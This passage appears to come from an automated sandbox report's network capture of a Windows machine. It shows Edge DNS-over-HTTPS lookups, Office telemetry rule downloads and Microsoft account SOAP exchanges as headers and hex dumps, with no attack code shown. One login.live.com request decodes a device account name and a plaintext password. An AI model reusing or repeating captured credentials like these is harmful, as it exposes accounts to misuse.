                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        36192.168.2.549811172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c566218718cee-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        37192.168.2.54980713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:35 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:35 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                        x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234935Z-r1d97b9957747b9jhC1TEBgyec00000009kg00000000s877
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        38192.168.2.54981340.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 7642
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 79 6d 6b 75 61 63 6a 71 66 61 75 6b 63 65 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 75 4c 6b 50 71 6c 4a 4e 76 51 4a 65 72 64 57 3a 67 65 53 72 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                                        Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02ymkuacjqfaukce</Membername><Password>uLkPqlJNvQJerdW:geSr</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:36 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C542_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: c7510075-11d7-4de9-b414-8d53bff2ef1e
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF00027B63 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:43 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 17166
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 38 30 31 30 34 30 30 46 36 41 35 37 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 65 61 31 30 62 35 31 33 2d 66 32 33 39 2d 34 65 61 32 2d 38 36 63 66 2d 64 33 30 61 33 31 62 62 32 63 31 65 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                                        Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>00188010400F6A57</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="ea10b513-f239-4ea2-86cf-d30a31bb2c1e" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                                        2024-11-20 23:49:43 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                                        Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        39192.168.2.54981240.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:48:36 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                                        x-ms-request-id: 2c9528f2-9b2a-4db7-a329-756eec0a0a1a
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002F019 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:36 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 1276
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        40192.168.2.54981413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:36 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                        x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234936Z-178bfbc474bnwsh4hC1NYC2ubs00000000tg00000000991w
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        41192.168.2.549819172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:36 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c56691f060f85-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e5 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        42192.168.2.54981713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:37 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                        x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234937Z-1777c6cb754dqf99hC1TEB5nps0000000a80000000000q5e
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
